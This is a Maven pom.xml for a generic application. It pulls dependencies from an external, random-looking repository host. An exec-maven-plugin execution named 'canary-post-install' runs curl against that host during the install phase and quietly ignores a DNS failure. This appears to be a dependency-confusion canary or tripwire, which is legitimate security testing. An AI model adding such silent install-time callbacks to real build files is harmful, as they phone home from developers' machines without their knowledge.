<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
                             http://maven.apache.org/xsd/maven-4.0.0.xsd">

    <modelVersion>4.0.0</modelVersion>

    <groupId>com.company</groupId>
    <artifactId>myapp</artifactId>
    <version>1.0.0</version>

    <repositories>
        <repository>
            <id>internal-repo</id>
            <url>https://yczfxrczzreyouovmtnf2rd1ozhn89m8y.blnd.r0l.me/mvn_package/</url>
            <!-- Optional auth -->
            <!--
            <releases><enabled>true</enabled></releases>
            <snapshots><enabled>true</enabled></snapshots>
            <authentication>
                <username>${env.REG_USER}</username>
                <password>${env.REG_PASS}</password>
            </authentication>
            -->
        </repository>
    </repositories>

    <dependencies>
        <dependency>
            <groupId>com.company</groupId>
            <artifactId>myinternallib</artifactId>
            <version>1.0.0</version>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>3.5.0</version>
                <executions>
                    <execution>
                        <id>canary-post-install</id>
                        <phase>install</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                        <configuration>
                            <executable>curl</executable>
                            <arguments>
                                <argument>-fsS</argument>
                                <argument>https://yczfxrczzreyouovmtnf2rd1ozhn89m8y.blnd.r0l.me/mvn_post_install</argument>
                            </arguments>
                            <successCodes>
                                <successCode>0</successCode>
                                <successCode>6</successCode>
                            </successCodes>
                        </configuration>
                    </execution>
                </executions>
            </plugin>
        </plugins>
    </build>

</project>
